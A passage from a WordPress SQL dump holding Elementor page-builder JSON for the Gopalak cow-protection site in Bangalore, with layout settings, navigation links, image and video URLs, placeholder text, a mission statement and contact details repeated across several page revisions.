inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9230,1586,'_elementor_page_assets','a:0:{}'),(9232,1587,'_elementor_edit_mode','builder'),(9233,1587,'_elementor_template_type','wp-page'),(9234,1587,'_elementor_version','3.7.8'),(9235,1587,'_wp_page_template','elementor_canvas'),(9236,1587,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adobt\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":39,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":39,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9237,1587,'_elementor_page_assets','a:0:{}'),(9239,1588,'_elementor_edit_mode','builder'),(9240,1588,'_elementor_template_type','wp-page'),(9241,1588,'_elementor_version','3.7.8'),(9242,1588,'_wp_page_template','elementor_canvas'),(9243,1588,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adobt\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My 